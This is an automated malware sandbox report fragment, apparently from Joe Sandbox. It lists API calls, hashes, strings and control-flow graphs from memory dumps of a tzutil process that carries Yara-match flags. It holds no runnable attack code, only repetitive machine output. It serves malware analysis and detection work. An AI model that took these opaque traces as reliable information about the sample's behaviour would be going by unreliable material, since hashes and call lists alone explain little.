                                                    • Instruction Fuzzy Hash: DA90023120140C42D100B2584444B8A0006C7F0301F95C017A0124A58D8715C9517525
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                    • Associated: 00000006.00000002.2538262690.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3400000_tzutil.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: f2b091017c9f28c8a900117e2b27d45c1c94003280a1e4a53f373666f3404167
                                                    • Instruction ID: b67a08933cf5a815060eef9f3b48562ffb39c8f438640fc5365241e215c9c810
                                                    • Opcode Fuzzy Hash: f2b091017c9f28c8a900117e2b27d45c1c94003280a1e4a53f373666f3404167
                                                    • Instruction Fuzzy Hash: 5F90023120148C02D110B258844478E0006C7E0301F99C412A4424A5CD879589917125
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                    • Associated: 00000006.00000002.2538262690.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3400000_tzutil.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 37e6147fe09257f3122507df560be3285eef27172d5cc52c7f670308aa226da7
                                                    • Instruction ID: 946a263a7d4d4efd4ba6c07d996a6645221cdf0dd07269b2c62c99fa2a5343fa
                                                    • Opcode Fuzzy Hash: 37e6147fe09257f3122507df560be3285eef27172d5cc52c7f670308aa226da7
                                                    • Instruction Fuzzy Hash: 4790023120140802D100B698544868A0006C7F0301F95D012A5024959EC76589916135

                                                    Control-flow Graph

                                                    control_flow_graph 429 97114d-971158 430 97115a-971166 429->430 431 9711d8-971247 call 98b890 call 98c2a0 call 974990 call 9613e0 call 982000 429->431 433 9711c3-9711d4 430->433 434 971168 430->434 445 971267-97126d 431->445 446 971249-971258 PostThreadMessageW 431->446 434->433 446->445 447 97125a-971264 446->447 447->445
                                                    APIs
                                                    • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 00971254
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_960000_tzutil.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID: UQ63g7r-$UQ63g7r-
                                                    • API String ID: 1836367815-2341035416

                                                    Control-flow Graph

                                                    control_flow_graph 448 9711d6-971247 call 98b890 call 98c2a0 call 974990 call 9613e0 call 982000 460 971267-97126d 448->460 461 971249-971258 PostThreadMessageW 448->461 461->460 462 97125a-971264 461->462 462->460
                                                    APIs
                                                    • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 00971254
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_960000_tzutil.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID: UQ63g7r-$UQ63g7r-
                                                    • API String ID: 1836367815-2341035416

                                                    Control-flow Graph

                                                    control_flow_graph 463 9711e0-971247 call 98b890 call 98c2a0 call 974990 call 9613e0 call 982000 474 971267-97126d 463->474 475 971249-971258 PostThreadMessageW 463->475 475->474 476 97125a-971264 475->476 476->474
                                                    APIs
                                                    • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 00971254
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_960000_tzutil.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID: UQ63g7r-$UQ63g7r-
                                                    • API String ID: 1836367815-2341035416
                                                    APIs
                                                    • Sleep.KERNELBASE(000007D0), ref: 00983EDD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_960000_tzutil.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID: net.dll$wininet.dll
                                                    • API String ID: 3472027048-1269752229
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_960000_tzutil.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InitializeUninitialize
                                                    • String ID: @J7<
                                                    • API String ID: 3442037557-2016760708
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_960000_tzutil.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00974A02
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_960000_tzutil.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    • Opcode ID: aa15e0bea88f3d3eb8164487ffdb839de0913709777854031ac92b482dca4ce8
                                                    • Instruction ID: fe322eea2e866233917d5628c017281565d5023ef1ac482add8df3cbfe0b720a
                                                    • Opcode Fuzzy Hash: aa15e0bea88f3d3eb8164487ffdb839de0913709777854031ac92b482dca4ce8
                                                    • Instruction Fuzzy Hash: E721CD3764015A9FCB15CE28C845AFAFF6CEB92714B25C2E8D46C8B243E3329C06C795
                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00974A02
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_960000_tzutil.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    APIs
                                                    • CreateProcessInternalW.KERNELBASE(?,?,?,?,00978724,00000010,?,?,?,00000044,?,00000010,00978724,?,?,?), ref: 00989BB3
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_960000_tzutil.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateInternalProcess
                                                    • String ID:
                                                    • API String ID: 2186235152-0
                                                    APIs
                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00969F62
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_960000_tzutil.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateThread
                                                    • String ID:
                                                    • API String ID: 2422867632-0
                                                    APIs
                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00969F62
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_960000_tzutil.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateThread
                                                    • String ID:
                                                    • API String ID: 2422867632-0
                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(00971E59,?,00985F17,00971E59,?,00985F17,?,00971E59,009859BF,00001000,?,00000000), ref: 00989AC9
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_960000_tzutil.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,3777EA40,00000007,00000000,00000004,00000000,00974211,000000F4), ref: 00989B09
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_960000_tzutil.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID:
                                                    • API String ID: 3298025750-0
                                                    APIs
                                                    • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 0097878A
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_960000_tzutil.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    APIs
                                                    • SetErrorMode.KERNELBASE(00008003,?,?,00972150,009882FF,?,0097211B), ref: 00978591
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_960000_tzutil.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                    • Associated: 00000006.00000002.2538262690.0000000003529000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000006.00000002.2538262690.000000000352D000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3400000_tzutil.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538113397.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3300000_tzutil.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538113397.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3300000_tzutil.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                    • API String ID: 0-3558027158
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                    • Associated: 00000006.00000002.2538262690.0000000003529000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000006.00000002.2538262690.000000000352D000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3400000_tzutil.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                    • API String ID: 48624451-2108815105
                                                    Strings
                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 034A4787
                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 034A4725
                                                    • ExecuteOptions, xrefs: 034A46A0
                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 034A4655
                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 034A4742
                                                    • Execute=1, xrefs: 034A4713
                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 034A46FC
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                    • Associated: 00000006.00000002.2538262690.0000000003529000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000006.00000002.2538262690.000000000352D000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3400000_tzutil.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                    • API String ID: 0-484625025
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                    • Associated: 00000006.00000002.2538262690.0000000003529000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000006.00000002.2538262690.000000000352D000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3400000_tzutil.jbxd
                                                    Similarity
                                                    • API ID: __aulldvrm
                                                    • String ID: +$-$0$0
                                                    • API String ID: 1302938615-699404926
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538113397.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3300000_tzutil.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: XQcQ$X]_Q$gURU$uZPF$vA]X$w\F[$y[N]
                                                    • API String ID: 0-1416458366
                                                    Strings
                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 034A02BD
                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 034A02E7
                                                    • RTL: Re-Waiting, xrefs: 034A031E
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                    • Associated: 00000006.00000002.2538262690.0000000003529000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000006.00000002.2538262690.000000000352D000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3400000_tzutil.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                    • API String ID: 0-2474120054
                                                    Strings
                                                    • RTL: Resource at %p, xrefs: 034A7B8E
                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 034A7B7F
                                                    • RTL: Re-Waiting, xrefs: 034A7BAC
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                    • Associated: 00000006.00000002.2538262690.0000000003529000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000006.00000002.2538262690.000000000352D000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3400000_tzutil.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 0-871070163
                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 034A728C
                                                    Strings
                                                    • RTL: Resource at %p, xrefs: 034A72A3
                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 034A7294
                                                    • RTL: Re-Waiting, xrefs: 034A72C1
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                    • Associated: 00000006.00000002.2538262690.0000000003529000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000006.00000002.2538262690.000000000352D000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3400000_tzutil.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 885266447-605551621
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                    • Associated: 00000006.00000002.2538262690.0000000003529000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000006.00000002.2538262690.000000000352D000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3400000_tzutil.jbxd
                                                    Similarity
                                                    • API ID: __aulldvrm
                                                    • String ID: +$-
                                                    • API String ID: 1302938615-2137968064
                                                    • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                    • Instruction ID: 3797f2461f9603d70e8fd521aef8a8712ad08115261ae9cbbc3048cfe937b5e3
                                                    • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                    • Instruction Fuzzy Hash: 9B918170E002169EDB24DF69C981AFFBBA5AF44720F98451BE865EF3D0D73099428B58
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                    • Associated: 00000006.00000002.2538262690.0000000003529000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000006.00000002.2538262690.000000000352D000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3400000_tzutil.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $$@
                                                    • API String ID: 0-1194432280
                                                    • Opcode ID: 3d3a6df4a55a9d22efad0b02051240eda7e941a3c43e449110ee5704ea889b29
                                                    • Instruction ID: ab6d1f0bf04d725aa5249a3fc28d94c7fe4129c2b41d4a5fb15b4e3b71714d27
                                                    • Opcode Fuzzy Hash: 3d3a6df4a55a9d22efad0b02051240eda7e941a3c43e449110ee5704ea889b29
                                                    • Instruction Fuzzy Hash: D5814B76D002699BEB31CF54CC44BEEB6B4AB09710F0445EBE919BB290D7709E85CFA4